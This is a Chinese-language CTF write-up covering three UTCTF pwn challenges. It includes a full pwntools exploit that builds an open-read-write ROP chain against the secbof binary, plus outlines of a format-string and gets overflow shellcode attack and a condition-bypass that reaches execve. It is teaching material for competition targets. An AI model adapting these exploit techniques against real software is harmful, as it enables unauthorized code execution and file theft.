UTCTF部分题解教学文档<\/h1>

secbof题目解析<\/h2>

题目描述<\/h3>

缓冲区溢出漏洞，但带有安全保护<\/li>
Flag存储在".\/flag.txt"文件中<\/li>

需要构造ORW(open-read-write)链读取并输出flag<\/li> <\/ul>

保护检查<\/h3>

沙盒允许使用open、read、write系统调用<\/li>

题目是静态编译的，所有函数\/寄存器地址可直接获取<\/li> <\/ul>

解题步骤<\/h3>

构造open调用<\/strong>：<\/p>

由于没有直接找到open函数地址，需要使用syscall构造<\/li>
需要将"flag.txt"文件名写入bss段(地址:0x4C82C0)<\/li>
使用read函数(地址:0x44F8E0)读取用户输入的"flag.txt"到bss段<\/li> <\/ul> <\/li>

寄存器设置<\/strong>：<\/p>

rdi寄存器设置(地址:0x000000000040204f)<\/li>
rsi寄存器设置(地址:0x000000000040a0be)<\/li>
rdx\/rbx寄存器设置(地址:0x000000000048630b)<\/li>
syscall地址:0x000000000041ae16<\/li>
rax设置(地址:0x0000000000450507)<\/li> <\/ul> <\/li>

远程问题解决<\/strong>：<\/p>

远程环境中read函数需要文件描述符fd=5才能正常工作<\/li> <\/ul> <\/li> <\/ol>
利用代码<\/h3>
from<\/span> pwn import<\/span> *<\/span> <\/span><\/span>context(log_level =<\/span> 'debug'<\/span>, arch =<\/span> 'amd64'<\/span>) <\/span><\/span> <\/span><\/span>p =<\/span> remote('challenge.utctf.live'<\/span>, 5141<\/span>) <\/span><\/span>elf =<\/span> ELF('.\/secbof'<\/span>) <\/span><\/span> <\/span><\/span># 关键地址<\/span> <\/span><\/span>bss =<\/span> 0x4C82C0<\/span> <\/span><\/span>read =<\/span> 0x44F8E0<\/span> <\/span><\/span>write =<\/span> 0x44F980<\/span> <\/span><\/span>rdi =<\/span> 0x000000000040204f<\/span> <\/span><\/span>rsi =<\/span> 0x000000000040a0be<\/span> <\/span><\/span>rdx_rbx =<\/span> 0x000000000048630b<\/span> <\/span><\/span>syscall =<\/span> 0x000000000041ae16<\/span> <\/span><\/span>rax =<\/span> 0x0000000000450507<\/span> <\/span><\/span> <\/span><\/span># 构造payload<\/span> <\/span><\/span>payload =<\/span> b<\/span>'a'<\/span>*<\/span>0x88<\/span> # 填充缓冲区<\/span> <\/span><\/span>payload +=<\/span> p64(rdi) +<\/span> p64(0<\/span>) +<\/span> p64(rsi) +<\/span> p64(bss+<\/span>0x500<\/span>) +<\/span> p64(rdx_rbx) +<\/span> p64(0x100<\/span>)*<\/span>2<\/span> +<\/span> p64(read) # 读取flag.txt文件名<\/span> <\/span><\/span>payload +=<\/span> p64(rdi) +<\/span> p64(bss+<\/span>0x500<\/span>) +<\/span> p64(rsi) +<\/span> p64(0<\/span>) +<\/span> p64(rax) +<\/span> p64(2<\/span>) +<\/span> p64(syscall) # open调用<\/span> <\/span><\/span>payload +=<\/span> p64(rdi) +<\/span> p64(5<\/span>) +<\/span> p64(rsi) +<\/span> p64(bss+<\/span>0x600<\/span>) +<\/span> p64(rdx_rbx) +<\/span> p64(0x100<\/span>)*<\/span>2<\/span> +<\/span> p64(read) # 读取flag内容<\/span> <\/span><\/span>payload +=<\/span> p64(rdi) +<\/span> p64(1<\/span>) +<\/span> p64(rsi) +<\/span> p64(bss+<\/span>0x600<\/span>) +<\/span> p64(rdx_rbx) +<\/span> p64(0x100<\/span>)*<\/span>2<\/span> +<\/span> p64(write) # 输出flag<\/span> <\/span><\/span> <\/span><\/span>p.<\/span>recvuntil(b<\/span>"Input> "<\/span>) <\/span><\/span>p.<\/span>send(payload) <\/span><\/span>p.<\/span>recvuntil("Flag: "<\/span>) <\/span><\/span>p.<\/span>send(b<\/span>'flag.txt'<\/span>) <\/span><\/span>p.<\/span>interactive() <\/span><\/span><\/code><\/pre>RETirement Plan题目解析<\/h2> 题目描述<\/h3> 无任何保护措施<\/li> 存在gets函数溢出漏洞<\/li> 存在格式化字符串漏洞<\/li> <\/ul> 解题思路<\/h3> 利用格式化字符串漏洞<\/strong>：<\/p> 泄露栈地址，确定shellcode写入位置<\/li> 不能用垃圾数据填充多余空间，会导致程序卡死<\/li> 可以使用bss段地址填充栈<\/li> <\/ul> <\/li> 执行shellcode<\/strong>：<\/p> 将shellcode写入返回地址后面<\/li> 返回地址+8的位置执行shellcode<\/li> 替代方案：利用gets函数执行后rax寄存器存储栈空间头地址的特性，通过jmp_rax直接跳转到shellcode<\/li> <\/ul> <\/li> <\/ol> Tic Tac Toe题目解析<\/h2> 题目特点<\/h3> 代码较长但逻辑简单<\/li> 主要是一系列条件判断<\/li> 通过所有检查后执行execve获取shell<\/li> <\/ul> 解题方法<\/h3> 分析并满足所有条件判断<\/li> 通过检查后直接获取shell<\/li> <\/ol> 总结<\/h2> secbof<\/strong>：<\/p> 重点在于构造ORW链<\/li> 注意远程环境中read的特殊要求(fd=5)<\/li> 静态编译环境下直接使用已知函数地址<\/li> <\/ul> <\/li> RETirement Plan<\/strong>：<\/p> 结合格式化字符串和缓冲区溢出漏洞<\/li> 注意栈空间填充的特殊要求<\/li> 考虑寄存器状态对利用的影响<\/li> <\/ul> <\/li> Tic Tac Toe<\/strong>：<\/p> 耐心分析条件判断逻辑<\/li> 满足所有条件后直接获取shell<\/li> <\/ul> <\/li> <\/ol> 这些题目展示了不同场景下的漏洞利用技术，从直接的缓冲区溢出到需要构造复杂ROP链的情况，涵盖了CTF比赛中常见的几种漏洞利用方式。<\/p>